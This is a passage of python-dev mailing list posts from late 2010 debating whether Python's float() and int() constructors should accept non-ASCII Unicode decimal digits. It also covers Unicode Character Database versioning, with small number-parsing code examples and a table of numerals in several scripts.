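    "10,\u0e51\u0e50,\u0f21\u0f20\n"
)
reader = csv.reader(data)
next(reader)  # skip the header row
# int() accepts any code points of category Nd, not just 0-9
rows = [[int(cell) for cell in row] for row in reader]
assert rows == [[1, 1, 1], [10, 10, 10]]
```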

I'd say: case closed :-)

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Dec 03 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


Numbers in various scripts,,
,,
Arabic,Thai,Dzongkha
1,๑,༡
2,๒,༢
3,๓,༣
4,๔,༤
5,๕,༥
6,๖,༦
7,๗,༧
8,๘,༨
9,๙,༩
10,๑๐,༡༠
11,๑๑,༡༡
12,๑๒,༡༢
13,๑๓,༡༣
14,๑๔,༡༤
15,๑๕,༡༥
16,๑๖,༡༦
17,๑๗,༡༧
18,๑๘,༡༨
19,๑๙,༡༩
20,๒๐,༢༠


Re: [Python-Dev] Python and the Unicode Character Database

2010-12-02 Thread M.-A. Lemburg
Martin v. Löwis wrote:
 Now, one may wonder what precisely "a possibly signed floating point
 number" is, but most likely, this refers to

 floatnumber   ::=  pointfloat | exponentfloat
 pointfloat    ::=  [intpart] fraction | intpart "."
 exponentfloat ::=  (intpart | pointfloat) exponent
 intpart       ::=  digit+
 fraction      ::=  "." digit+
 exponent      ::=  ("e" | "E") ["+" | "-"] digit+
 digit         ::=  "0"..."9"

 I don't see why the language spec should limit the wealth of number
 formats supported by float().
 
 If it doesn't, there should be some other specification of what
 is correct and what is not. It must not be unspecified.

True.

 It is not uncommon for Asians and other non-Latin script users to
 use their own native script symbols for numbers. Just because these
 digits may look strange to someone doesn't mean that they are
 meaningless or should be discarded.
 
 Then these users should speak up and indicate their need, or somebody
 should speak up and confirm that there are users who actually want
 '١٢٣٤.٥٦' to denote 1234.56. To my knowledge, there is no writing
 system in which '١٢٣٤.٥٦e4' means 12345600.0.

I'm not sure what you're after here.

 Please also remember that Python3 now allows Unicode names for
 identifiers for much the same reasons.
 
 No no no. Addition of Unicode identifiers has a well-designed,
 deliberate specification, with a PEP and all. The support for
 non-ASCII digits in float appears to be ad-hoc, and not founded
 on actual needs of actual users.

Please note that we didn't have PEPs and the PEP process at the
time. The Unicode proposal predates and in some respects inspired
the PEP process.

The decision to add this support was deliberate based on the desire
to support as much of the nice features of Unicode in Python as
we could. At least that was what was driving me at the time.

Regarding actual needs of actual users: I don't buy that as an
argument when it comes to supporting a standard that is meant
to attract users with non-ASCII origins.

Some references you may want to read up on:

http://en.wikipedia.org/wiki/Numbers_in_Chinese_culture
http://en.wikipedia.org/wiki/Vietnamese_numerals
http://en.wikipedia.org/wiki/Korean_numerals
http://en.wikipedia.org/wiki/Japanese_numerals

Even MS Office supports them:

http://languages.siuc.edu/Chinese/Language_Settings.html

 Note that the support in float() (and the other numeric constructors)
 to work with Unicode code points was explicitly added when Unicode
 support was added to Python and has been available since Python 1.6.
 
 That doesn't necessarily make it useful. Alexander's complaint is that
 it makes Python unstable (i.e. changing as the UCD changes).

If that were true, then all Unicode database (UCD) changes would make
Python unstable. However, most changes to existing code points in the UCS
are bug fixes, so they actually have a stabilizing quality more than
a destabilizing one.

 It is not a bug by any definition of bug
 
 Most certainly it is: the documentation is either underspecified,
 or deviates from the implementation (when taking the most plausible
 interpretation). This is the very definition of bug.

The implementation is not a bug and neither was this a bug in the
2.x series of the Python documentation. The Python 3.x docs apparently
introduced a reference to the language spec which is clearly not
capturing the wealth of possible inputs.

So, yes, we're talking about a documentation bug, but not an
implementation bug.
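
The gap between the documented grammar and the implementation is easy
to demonstrate (Python 3; the escapes below are Arabic-Indic digits):

```python
# The reference grammar only lists the digits 0...9, yet the numeric
# constructors accept any code point of category Nd (the decimal
# point and the exponent marker still have to be ASCII):
assert int("\u0661\u0662\u0663\u0664") == 1234
assert float("\u0661\u0662\u0663\u0664.\u0665\u0666") == 1234.56
```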

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Nov 29 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/




Re: [Python-Dev] Python and the Unicode Character Database

2010-12-02 Thread M.-A. Lemburg
Martin v. Löwis wrote:
 [...]
 For direct entry by an interactive user, yes. Why are some people in
 this discussion thinking only of direct entry by an interactive user?
 
 Ultimately, somebody will have entered the data.

I don't think you really believe that all data processed by a
computer was eventually manually entered by someone :-)

I already gave you a couple of examples of how such data can
end up being input for Python number constructors. If you are
still curious, please see the Wikipedia pages I linked to,
or have a look at these keyboards:

http://en.wikipedia.org/wiki/File:KB_Arabic_MAC.svg
http://en.wikipedia.org/wiki/File:Keyboard_Layout_Sanskrit.png
http://en.wikipedia.org/wiki/File:800px-KB_Thai_Kedmanee.png
http://en.wikipedia.org/wiki/File:Tibetan_Keyboard.png
http://en.wikipedia.org/wiki/File:KBD-DZ-noshift-2009.png

(all referenced on http://en.wikipedia.org/wiki/Keyboard_layout)

and then compare these to:

http://www.unicode.org/Public/5.2.0/ucd/extracted/DerivedNumericType.txt

Arabic numerals are being used a lot nowadays in Asian countries,
but that doesn't mean that the native script versions are not
being used anymore.

Furthermore, data can well originate from texts that were written
hundreds or even thousands of years ago, so there is plenty of
material available for processing.

Even if not entered directly, there are plenty of ways to convert
Arabic numerals (or other numeral systems) to the above forms,
e.g. in MS Office for Thai:

http://office.microsoft.com/en-us/excel-help/convert-arabic-numbers-to-thai-text-format-HP003074364.aspx

Anyway, as mentioned before: all this is really besides the point:

If we want to support Unicode in Python, we have to also support
conversion of numerals declared in Unicode into a form that can
be processed by Python. Regardless of where such data originates.
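
What drives this conversion is the decimal-digit property recorded in
the UCD; a quick sketch using the stdlib:

```python
import unicodedata

# ASCII, Arabic-Indic, Thai and Tibetan "five" all carry the same
# decimal value in the Unicode Character Database:
for five in "5\u0665\u0e55\u0f25":
    assert unicodedata.category(five) == "Nd"
    assert unicodedata.decimal(five) == 5
assert int("\u0665") == 5
```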

If we were not to follow this approach, we could just as well
decide not to support reading Egyptian Hieroglyphs based
on the argument that there's no keyboard to enter them...

http://www.unicode.org/charts/PDF/U13000.pdf  :-)

(from http://www.unicode.org/charts/)

 Input from an existing text file, as I said earlier.
 
 Which *specific* existing text file? Have you actually *seen* such a
 text file?

Have you tried Google ?

http://www.google.com/search?q=١٢٣
http://www.google.com/search?q=٣+site%3Agov.lb

Some examples:

http://www.bdl.gov.lb/circ/intpdf/int123.pdf
http://www.cdr.gov.lb/study/sdatl/Arabic/Chapter3.PDF
http://www.batroun.gov.lb/PDF/Waredat2006.pdf

(these all use http://en.wikipedia.org/wiki/Eastern_Arabic_numerals)

 Direct entry at the console is a red herring.
 
 And we don't need powerhouses because power comes out of the socket.

Martin, the argument simply doesn't fit well with the discussion
about Python and Unicode.

We introduced Unicode in Python not because there was a need
for each and every code point in Unicode, but because we wanted
to adopt a standard which doesn't prefer any one way of writing
things over another.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Dec 02 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/




Re: [Python-Dev] Python and the Unicode Character Database

2010-12-02 Thread M.-A. Lemburg
Eric Smith wrote:
 The current behavior should go nowhere; it is not useful. Something very
 similar to the current behavior (but done correctly) should go into the
 locale module.
 
 I agree with everything Martin says here. I think the basic premise is:
 you won't find strings in the wild that use non-ASCII digits but do
 use the ASCII dot as a decimal point. And that's what float() is looking
 for. (And that doesn't even begin to address what it expects for an
 exponent 'e'.)

http://en.wikipedia.org/wiki/Decimal_mark

In China, comma and space are used to mark digit groups because dot is used as 
decimal mark.

Note that float() can also parse integers, it just returns them as
floats :-)

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Dec 02 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/




Re: [Python-Dev] Python and the Unicode Character Database

2010-12-02 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 On Thu, Dec 2, 2010 at 4:14 PM, M.-A. Lemburg m...@egenix.com wrote:
 ..
 Have you tried Google ?

 
 I tried Google but I could not find any plain text or HTML file that
 would use Arabic-Indic numerals.  What was interesting, though, was
 that a search for "quran unicode" (without quotes) brought me to
 http://www.sacred-texts.com which says that they've been using unicode
 since 2002 in their archives.  Interestingly enough, their version of
 Qur'an uses ordinary digits for ayah numbers.  See, for example
 http://www.sacred-texts.com/isl/uq/050.htm.
 
 I will change my mind on this issue when you present a
 machine-readable file with Arabic-Indic numerals and a program capable
 of reading it and show that this program uses the same number parsing
 algorithm as Python's int() or float().

Have you had a look at the examples I posted ? They include texts
and tables with numbers written using east asian arabic numerals.

Here's an example of a famous Chinese text using Chinese numerals:

http://ctext.org/nine-chapters

Unfortunately, the Chinese numerals are not listed in the category Nd,
so Python won't be able to parse them. This has various reasons, it
seems, one of them being that the numeral code points were not defined
as a range of code points.
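
The distinction is easy to check (Python 3): digits of category Nd
parse, while ideographic numerals do not:

```python
assert int("\u0e52\u0e50") == 20   # Thai digits (category Nd) parse fine
try:
    int("\u4e8c\u5341")            # Chinese 二十 (category Lo) does not
except ValueError:
    pass
else:
    raise AssertionError("expected ValueError")
```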

I'm sure you can find other books on mathematics in Sanskrit or
Arabic scripts as well.

But this whole branch of the discussion is not going to go anywhere.

The point is that we support all of Unicode in Python, not just a fragment,
and therefore the numeric constructors support all of Unicode.

Using them, it's very easy to support numbers in all kinds of variants,
whether bound to a locale or not.

Adding more locale aware numeric parsers and formatters to the
locale module, based on these APIs is certainly a good idea,
but orthogonal to the ongoing discussion, IMO.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Dec 02 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/




Re: [Python-Dev] Python and the Unicode Character Database

2010-12-02 Thread M.-A. Lemburg
Terry Reedy wrote:
 On 11/29/2010 10:19 AM, M.-A. Lemburg wrote:
 Nick Coghlan wrote:
 On Mon, Nov 29, 2010 at 9:02 PM, M.-A. Lemburgm...@egenix.com  wrote:
 If we would go down that road, we would also have to disable other
 Unicode features based on locale, e.g. whether to apply non-ASCII
 case mappings, what to consider whitespace, etc.

 We don't do that for a good reason: Unicode is supposed to be
 universal and not limited to a single locale.

 Because parsing numbers is about more than just the characters used
 for the individual digits. There are additional semantics associated
 with digit ordering (for any number) and decimal separators and
 exponential notation (for floating point numbers) and those vary by
 locale. We deliberately chose to make the builtin numeric parsers
 unaware of all of those things, and assuming that we can simply parse
 other digits as if they were their ASCII equivalents and otherwise
 assume a C locale seems questionable.

 Sure, and those additional semantics are locale dependent, even
 between ASCII-only locales. However, that does not apply to the
 basic building blocks, the decimal digits themselves.

 If the existing semantics can be adequately defined, documented and
 defended, then retaining them would be fine. However, the language
 reference needs to define the behaviour properly so that other
 implementations know what they need to support and what can be chalked
 up as being just an implementation accident of CPython. (As a point in
 the plus column, both decimal.Decimal and fractions.Fraction were able
 to handle the '١٢٣٤.٥٦' example in a manner consistent with the int
 and float handling)

 The support is built into the C API, so there's not really much
 surprise there.

 Regarding documentation, we'd just have to add that numbers may
 be made up of Unicode code points in the category Nd.

 See http://www.unicode.org/versions/Unicode5.2.0/ch04.pdf, section
 4.6 for details

 
 Decimal digits form a large subcategory of numbers consisting of those
 digits that can be
 used to form decimal-radix numbers. They include script-specific
 digits, but exclude char-
 acters such as Roman numerals and Greek acrophonic numerals. (Note
 that <1, 5> = 15 =
 fifteen, but <I, V> = IV = four.) Decimal digits also exclude the
 compatibility subscript or
 superscript digits to prevent simplistic parsers from misinterpreting
 their values in context.
 

 int(), float() and long() (in Python2) are such simplistic
 parsers.
 
 Since you are the knowledgeable advocate of the current behavior, perhaps
 you could open an issue and propose a doc patch, even if not .rst
 formatted.

Good suggestion. I tried to collect as much context as possible:

http://bugs.python.org/issue10610

I'll leave the rst-magic to someone else, but will certainly help
if you have more questions about the details.

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Python and the Unicode Character Database

2010-12-02 Thread M.-A. Lemburg
Eric Smith wrote:
 On 12/2/2010 5:43 PM, M.-A. Lemburg wrote:
 Eric Smith wrote:
 The current behavior should go nowhere; it is not useful. Something
 very
 similar to the current behavior (but done correctly) should go into the
 locale module.

 I agree with everything Martin says here. I think the basic premise is:
 you won't find strings in the wild that use non-ASCII digits but do
 use the ASCII dot as a decimal point. And that's what float() is looking
 for. (And that doesn't even begin to address what it expects for an
 exponent 'e'.)

 http://en.wikipedia.org/wiki/Decimal_mark

 In China, comma and space are used to mark digit groups because dot
 is used as decimal mark.
 
 Is that an ASCII dot? That page doesn't say.

Yes, but to be fair: I think that the page actually refers to the
use of the Arabic numeral format in China, rather than with their
own script symbols.

 Note that float() can also parse integers, it just returns them as
 floats :-)
 
 :)

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Python and the Unicode Character Database

2010-12-01 Thread M.-A. Lemburg
Terry Reedy wrote:
 On 11/30/2010 10:05 AM, Alexander Belopolsky wrote:
 
 My general answers to the questions you have raised are as follows:
 
 1. Each new feature release should use the latest version of the UCD as
 of the first beta release (or perhaps a week or so before). New chars
 are new features and the beta period can be used to (hopefully) iron out
 any bugs introduced by a new UCD version.

The UCD is versioned just like Python is, so if the Unicode Consortium
decides to ship a 5.2.1 version of the UCD, we can add that to Python 2.7.x,
since Python 2.7 started out with 5.2.0.

 2. The language specification should not be UCD version specific. Martin
 pointed out that the definition of identifiers was intentionally written
 to not be, by referring to 'current version' or some such. On the other
 hand, the UCD version used should be programmatically discoverable,
 perhaps as an attribute of sys or str.

It already is and has been for while, e.g.

Python 2.5:
>>> import unicodedata
>>> unicodedata.unidata_version
'4.1.0'

 3. The UCD should not change in bugfix releases. New chars are new
 features. Adding them in bugfix releases will introduce gratuitous
 incompatibilities between releases. People who want the latest Unicode
 should either upgrade to the latest Python version or patch an older
 version (but not expect core support for any problems that creates).

See above. Patch level revisions of the UCD are fine for patch level
releases of Python, since those patch level revisions of the UCD fix
bugs just like we do in Python.

Note that each new UCD major.minor version is a new standard on its
own, so it's perfectly ok to stick with one such standard version
per Python version.

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Python and the Unicode Character Database

2010-12-01 Thread M.-A. Lemburg
Martin v. Löwis wrote:
 Am 30.11.2010 21:24, schrieb Ben Finney:
 haiyang kang corn...@gmail.com writes:

   I think it is a little ugly to have code like this: num =
 float('一.一'), expected result is: num = 1.1

 That's a straw man, though. The string need not be a literal in the
 program; it can be input to the program.

 num = float(input_from_the_external_world)

 Does that change your assessment of whether non-ASCII digits are used?
 
 I think the OP (haiyang kang) already indicated that he finds it quite
 unlikely that anybody would possibly want to enter that. You would need
 a number of key strokes to enter each individual ideograph, plus you
 have to press the keys for keyboard layout switching to enter the Latin
 decimal separator (which you normally wouldn't use along with the Han
 numerals).

That's a somewhat limited view, IMHO. Numbers are not always entered
using a computer keyboard: you have tools like cash registers, special
numeric keypads, scanners, OCR, etc. for external entry, and you also
have other programs producing such output, e.g. MS Office if configured
that way.

The argument with the decimal point doesn't work well either, since
it's obvious that float() and int() do not support localized input.

E.g. in Germany we write 3,141 instead of 3.141:

>>> float('3,141')
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
ValueError: invalid literal for float(): 3,141

No surprise there. The localization of the input data, e.g. removal
of thousands separators and conversion of decimal marks to the dot,
have to be done by the application, just like you have to now for
German floating point number literals.
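To make the point concrete, the normalization an application would have to do for German input can be sketched like this (a minimal illustration only; the helper name is made up, and real code should prefer locale.atof() or a proper parser):

```python
def parse_de_float(text):
    # Illustrative only: strip German thousands separators ('.') and
    # turn the decimal comma into the dot that float() expects.
    return float(text.replace('.', '').replace(',', '.'))

print(parse_de_float('3,141'))     # 3.141
print(parse_de_float('1.234,56'))  # 1234.56
```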

The locale module already has locale.atof() and locale.atoi() for
just this purpose.

FYI, here's a list of decimal digits supported by Python 2.7:

http://www.unicode.org/Public/5.2.0/ucd/extracted/DerivedNumericType.txt:

0030..0039; Decimal # Nd  [10] DIGIT ZERO..DIGIT NINE
0660..0669; Decimal # Nd  [10] ARABIC-INDIC DIGIT ZERO..ARABIC-INDIC DIGIT 
NINE
06F0..06F9; Decimal # Nd  [10] EXTENDED ARABIC-INDIC DIGIT ZERO..EXTENDED 
ARABIC-INDIC DIGIT NINE
07C0..07C9; Decimal # Nd  [10] NKO DIGIT ZERO..NKO DIGIT NINE
0966..096F; Decimal # Nd  [10] DEVANAGARI DIGIT ZERO..DEVANAGARI DIGIT NINE
09E6..09EF; Decimal # Nd  [10] BENGALI DIGIT ZERO..BENGALI DIGIT NINE
0A66..0A6F; Decimal # Nd  [10] GURMUKHI DIGIT ZERO..GURMUKHI DIGIT NINE
0AE6..0AEF; Decimal # Nd  [10] GUJARATI DIGIT ZERO..GUJARATI DIGIT NINE
0B66..0B6F; Decimal # Nd  [10] ORIYA DIGIT ZERO..ORIYA DIGIT NINE
0BE6..0BEF; Decimal # Nd  [10] TAMIL DIGIT ZERO..TAMIL DIGIT NINE
0C66..0C6F; Decimal # Nd  [10] TELUGU DIGIT ZERO..TELUGU DIGIT NINE
0CE6..0CEF; Decimal # Nd  [10] KANNADA DIGIT ZERO..KANNADA DIGIT NINE
0D66..0D6F; Decimal # Nd  [10] MALAYALAM DIGIT ZERO..MALAYALAM DIGIT NINE
0E50..0E59; Decimal # Nd  [10] THAI DIGIT ZERO..THAI DIGIT NINE
0ED0..0ED9; Decimal # Nd  [10] LAO DIGIT ZERO..LAO DIGIT NINE
0F20..0F29; Decimal # Nd  [10] TIBETAN DIGIT ZERO..TIBETAN DIGIT NINE
1040..1049; Decimal # Nd  [10] MYANMAR DIGIT ZERO..MYANMAR DIGIT NINE
1090..1099; Decimal # Nd  [10] MYANMAR SHAN DIGIT ZERO..MYANMAR SHAN DIGIT 
NINE
17E0..17E9; Decimal # Nd  [10] KHMER DIGIT ZERO..KHMER DIGIT NINE
1810..1819; Decimal # Nd  [10] MONGOLIAN DIGIT ZERO..MONGOLIAN DIGIT NINE
1946..194F; Decimal # Nd  [10] LIMBU DIGIT ZERO..LIMBU DIGIT NINE
19D0..19DA; Decimal # Nd  [11] NEW TAI LUE DIGIT ZERO..NEW TAI LUE THAM 
DIGIT ONE
1A80..1A89; Decimal # Nd  [10] TAI THAM HORA DIGIT ZERO..TAI THAM HORA 
DIGIT NINE
1A90..1A99; Decimal # Nd  [10] TAI THAM THAM DIGIT ZERO..TAI THAM THAM 
DIGIT NINE
1B50..1B59; Decimal # Nd  [10] BALINESE DIGIT ZERO..BALINESE DIGIT NINE
1BB0..1BB9; Decimal # Nd  [10] SUNDANESE DIGIT ZERO..SUNDANESE DIGIT NINE
1C40..1C49; Decimal # Nd  [10] LEPCHA DIGIT ZERO..LEPCHA DIGIT NINE
1C50..1C59; Decimal # Nd  [10] OL CHIKI DIGIT ZERO..OL CHIKI DIGIT NINE
A620..A629; Decimal # Nd  [10] VAI DIGIT ZERO..VAI DIGIT NINE
A8D0..A8D9; Decimal # Nd  [10] SAURASHTRA DIGIT ZERO..SAURASHTRA DIGIT NINE
A900..A909; Decimal # Nd  [10] KAYAH LI DIGIT ZERO..KAYAH LI DIGIT NINE
A9D0..A9D9; Decimal # Nd  [10] JAVANESE DIGIT ZERO..JAVANESE DIGIT NINE
AA50..AA59; Decimal # Nd  [10] CHAM DIGIT ZERO..CHAM DIGIT NINE
ABF0..ABF9; Decimal # Nd  [10] MEETEI MAYEK DIGIT ZERO..MEETEI MAYEK DIGIT 
NINE
FF10..FF19; Decimal # Nd  [10] FULLWIDTH DIGIT ZERO..FULLWIDTH DIGIT NINE
104A0..104A9  ; Decimal # Nd  [10] OSMANYA DIGIT ZERO..OSMANYA DIGIT NINE
1D7CE..1D7FF  ; Decimal # Nd  [50] MATHEMATICAL BOLD DIGIT ZERO..MATHEMATICAL 
MONOSPACE DIGIT NINE


The Chinese and Japanese ideographs are not supported because of the
way they are defined in the Unihan database. I'm currently
investigating how we could support them as well.

-- 
Marc-Andre Lemburg
eGenix.com


Re: [Python-Dev] Python and the Unicode Character Database

2010-12-01 Thread M.-A. Lemburg
Terry Reedy wrote:
 On 11/30/2010 3:23 AM, Stephen J. Turnbull wrote:
 
 I see no reason not to make a similar promise for numeric literals.  I
 see no good reason to allow compatibility full-width Japanese ASCII
 numerals or Arabic cursive numerals in for i in range(...) for
 example.
 
 I do not think that anyone, at least not me, has argued for anything
 other than 0-9 digits (or 0-f for hex) in literals in program code. The
 only issue is whether non-programmer *users* should be able to use their
 native digits in applications in response to input prompts.

Me neither. This is solely about Python being able to parse numeric
input in the float(), int() and complex() constructors.
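For reference, this is the behavior under discussion; on a current Python 3 the constructors accept any Unicode decimal digits (category Nd) as long as the sign, decimal point and exponent stay in ASCII form:

```python
# Non-ASCII decimal digits are accepted by the numeric constructors:
print(int('١٢٣٤'))       # Arabic-Indic digits -> 1234
print(float('١٢٣٤.٥٦'))  # -> 1234.56
print(int('१२३'))        # Devanagari digits -> 123
```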

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Python and the Unicode Character Database

2010-11-29 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 On Sun, Nov 28, 2010 at 5:42 PM, M.-A. Lemburg m...@egenix.com wrote:
 ..
 I don't see why the language spec should limit the wealth of number
 formats supported by float().

 
 The Language Spec (whatever it is) should not, but hopefully the
 Library Reference should.  If you follow
 http://docs.python.org/dev/py3k/library/functions.html#float link and
 the references therein, you'll end up with

... the language spec again :-)

 digit  ::=  "0"..."9"
 
 http://docs.python.org/dev/py3k/reference/lexical_analysis.html#grammar-token-digit

That's obviously a bug in the documentation, since the Python 2.7 docs
don't mention any such relationship to the language spec:

http://docs.python.org/library/functions.html#float

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Python and the Unicode Character Database

2010-11-29 Thread M.-A. Lemburg
Nick Coghlan wrote:
 On Mon, Nov 29, 2010 at 1:39 PM, Stephen J. Turnbull step...@xemacs.org 
 wrote:
 I agree that Python should make it easy for the programmer to get
 numerical values of native numeric strings, but it's not at all clear
 to me that there is any point to having float() recognize them by
 default.
 
 Indeed, as someone else suggested earlier in the thread, supporting
 non-ASCII digits sounds more like a job for the locale module than for
 the builtin types.
 
 Deprecating non-ASCII support in the latter, while ensuring it is
 properly supported in the former sounds like a better way forward than
 maintaining the status quo (starting in 3.3 though, with the first
 beta just around the corner, we don't want to be monkeying with this
 in 3.2)

Since when do we only support certain Unicode features in specific
locales ?

If we would go down that road, we would also have to disable other
Unicode features based on locale, e.g. whether to apply non-ASCII
case mappings, what to consider whitespace, etc.

We don't do that for a good reason: Unicode is supposed to be
universal and not limited to a single locale.

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Python and the Unicode Character Database

2010-11-29 Thread M.-A. Lemburg
Nick Coghlan wrote:
 On Mon, Nov 29, 2010 at 9:02 PM, M.-A. Lemburg m...@egenix.com wrote:
 If we would go down that road, we would also have to disable other
 Unicode features based on locale, e.g. whether to apply non-ASCII
 case mappings, what to consider whitespace, etc.

 We don't do that for a good reason: Unicode is supposed to be
 universal and not limited to a single locale.
 
 Because parsing numbers is about more than just the characters used
 for the individual digits. There are additional semantics associated
 with digit ordering (for any number) and decimal separators and
 exponential notation (for floating point numbers) and those vary by
 locale. We deliberately chose to make the builtin numeric parsers
 unaware of all of those things, and assuming that we can simply parse
 other digits as if they were their ASCII equivalents and otherwise
 assume a C locale seems questionable.

Sure, and those additional semantics are locale dependent, even
between ASCII-only locales. However, that does not apply to the
basic building blocks, the decimal digits themselves.

 If the existing semantics can be adequately defined, documented and
 defended, then retaining them would be fine. However, the language
 reference needs to define the behaviour properly so that other
 implementations know what they need to support and what can be chalked
 up as being just an implementation accident of CPython. (As a point in
 the plus column, both decimal.Decimal and fractions.Fraction were able
 to handle the '١٢٣٤.٥٦' example in a manner consistent with the int
 and float handling)

The support is built into the C API, so there's not really much
surprise there.

Regarding documentation, we'd just have to add that numbers may
be made up of Unicode code points in the category Nd.

See http://www.unicode.org/versions/Unicode5.2.0/ch04.pdf, section
4.6 for details


Decimal digits form a large subcategory of numbers consisting of those digits 
that can be
used to form decimal-radix numbers. They include script-specific digits, but 
exclude characters such as Roman numerals and Greek acrophonic numerals. (Note
that <1, 5> = 15 = fifteen, but <I, V> = IV = four.) Decimal digits also
exclude the compatibility
subscript or
superscript digits to prevent simplistic parsers from misinterpreting their 
values in context.


int(), float() and long() (in Python2) are such simplistic
parsers.
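The distinction drawn in the quoted passage is directly observable via the unicodedata module (examples assume a Unicode 5.2+ database):

```python
import unicodedata

five = '٥'  # ARABIC-INDIC DIGIT FIVE
print(unicodedata.category(five))  # 'Nd' -- a decimal digit
print(unicodedata.digit(five))     # 5

four = 'Ⅳ'  # ROMAN NUMERAL FOUR
print(unicodedata.category(four))  # 'Nl' -- numeric, but not a decimal digit
print(unicodedata.numeric(four))   # 4.0
try:
    unicodedata.digit(four)
except ValueError:
    print('not a decimal digit')   # simplistic parsers rightly reject it
```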

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Python and the Unicode Character Database

2010-11-29 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 On Mon, Nov 29, 2010 at 2:22 AM, Martin v. Löwis mar...@v.loewis.de wrote:
 The former ensures that literals in code are always readable; the later
 allows users to enter numbers in their own number system. How could that
 be a bad thing?

 It's YAGNI, feature bloat. It gives the illusion of supporting something
 that actually isn't supported very well (namely, parsing local number
 strings). I claim that there is no meaningful application
 of this feature.

This is not about parsing local number strings, it's about
parsing number strings represented using different scripts -
besides en-US is a locale as well, ye know :-)

 Speaking of YAGNI, does anyone want to defend
 
 >>> complex('١٢٣٤.٥٦j')
 1234.56j
 
 ?

Yes. The same arguments apply.

Just because ASCII-proponents may have a hard time reading such
literals, doesn't mean that script users have the same trouble.

 Especially given that we reject complex('1234.56i'):
 
 http://bugs.python.org/issue10562

We've had that discussion long before we had Unicode in Python.
The main reason was that 'i' looked too similar to '1' in a number
of fonts, which is why it was rejected for Python source code.

However, I don't see any reason why we shouldn't accept both 'i' and
'j' for complex(), since the input to that constructor doesn't have
to originate in Python source code.
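As of current Python 3 the constructor still accepts only 'j' (a quick check of the status quo, not a statement about what it should do):

```python
print(complex('1+2j'))  # (1+2j)
try:
    complex('1+2i')     # 'i' is still rejected
except ValueError as exc:
    print('rejected:', exc)
```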

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Python and the Unicode Character Database

2010-11-28 Thread M.-A. Lemburg


Martin v. Löwis wrote:
 >>> float('١٢٣٤.٥٦')
 1234.56
 
 I think it's a bug that this works. The definition of the float builtin says
 
 Convert a string or a number to floating point. If the argument is a
 string, it must contain a possibly signed decimal or floating point
 number, possibly embedded in whitespace. The argument may also be
 '[+|-]nan' or '[+|-]inf'.
 
 Now, one may wonder what precisely a possibly signed floating point
 number is, but most likely, this refers to
 
 floatnumber   ::=  pointfloat | exponentfloat
 pointfloat    ::=  [intpart] fraction | intpart "."
 exponentfloat ::=  (intpart | pointfloat) exponent
 intpart       ::=  digit+
 fraction      ::=  "." digit+
 exponent      ::=  ("e" | "E") ["+" | "-"] digit+
 digit         ::=  "0"..."9"

I don't see why the language spec should limit the wealth of number
formats supported by float().

It is not uncommon for Asians and other non-Latin script users to
use their own native script symbols for numbers. Just because these
digits may look strange to someone doesn't mean that they are
meaningless or should be discarded.

Please also remember that Python3 now allows Unicode names for
identifiers for much the same reasons.

Note that the support in float() (and the other numeric constructors)
to work with Unicode code points was explicitly added when Unicode
support was added to Python and has been available since Python 1.6.

It is not a bug by any definition of bug, even though the feature
may bug someone occasionally to go read up a bit on what else
the world has to offer other than Arabic numerals :-)

http://en.wikipedia.org/wiki/Numeral_system
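For applications that do want to normalize native-script digits before further processing, a hypothetical helper (not part of the stdlib) could map category-Nd characters to their ASCII values:

```python
import unicodedata

def ascii_digits(text):
    # Hypothetical helper: replace every Unicode decimal digit
    # (category Nd) with its ASCII value; leave everything else alone.
    return ''.join(
        str(unicodedata.digit(ch)) if unicodedata.category(ch) == 'Nd' else ch
        for ch in text
    )

print(ascii_digits('١٢٣٤.٥٦'))  # '1234.56'
```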

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Python and the Unicode Character Database

2010-11-28 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 Two recently reported issues brought into light the fact that Python
 language definition is closely tied to character properties maintained
 by the Unicode Consortium. [1,2]  For example, when Python switches to
 Unicode 6.0.0 (planned for the upcoming 3.2 release), we will gain two
 additional characters that Python can use in identifiers. [3]
 
 With Python 3.1:
 
 >>> exec('\u0CF1 = 1')
 Traceback (most recent call last):
   File "<stdin>", line 1, in <module>
   File "<string>", line 1
ೱ = 1
  ^
 SyntaxError: invalid character in identifier
 
 but with Python 3.2a4:
 
 >>> exec('\u0CF1 = 1')
 >>> eval('\u0CF1')
 1

Such changes are not new, but I agree that they should probably
be highlighted in the What's new in Python x.x.

 Of course, the likelihood is low that this change will affect any
 user, but the change in str.isspace() reported in [1] is likely to
 cause some trouble:
 
 Python 2.6.5:
 >>> u'A\u200bB'.split()
 [u'A', u'B']
 
 Python 2.7:
 >>> u'A\u200bB'.split()
